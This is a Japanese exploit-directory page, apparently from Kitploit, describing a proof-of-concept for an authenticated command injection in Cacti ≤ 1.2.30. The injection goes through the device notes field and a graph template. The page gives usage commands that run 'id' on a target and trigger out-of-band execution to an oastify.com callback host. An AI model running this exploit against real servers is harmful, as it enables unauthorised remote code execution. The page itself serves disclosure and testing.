Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-39949 — Cacti ≤ 1.2.30 Auth RCE - ホスト変数インジェクション | Kitploit
ツール/GitHubGitHub/lukehebe/cve-2026-39949
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHublukehebe/cve-2026-39949

CVE-2026-39949

Cacti ≤ 1.2.30 Auth RCE - ホスト変数インジェクション

リポジトリを見る
12ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-39949: ホスト変数インジェクションによる Cacti の認証済みリモートコード実行

概要

Cacti ≤ 1.2.30 の OS コマンドインジェクションの脆弱性により、デバイスおよびグラフテンプレート作成権限を持つ認証済みユーザーは、基盤となるサーバー上で任意のコマンドを実行できます。この欠陥は、ユーザーが制御するホストメタデータフィールド(具体的にはデバイスのメモ欄)が、Cacti の変数置換エンジンを介して RRDtool のコマンドライン引数に、サニタイズやエスケープなしで代入されるために存在します。攻撃者は、メモ欄にシェルメタ文字を注入し、|host_notes| 変数を参照するグラフテンプレートを作成し、グラフレンダリングをトリガーすることで、Web サーバーユーザーとして完全なリモートコード実行を実現できます。

使用方法:

root@kitploit:~
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --cmd 'id'

OOB コマンド実行:

root@kitploit:~
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --oob your.oastify.com
image image image
ツールをダウンロード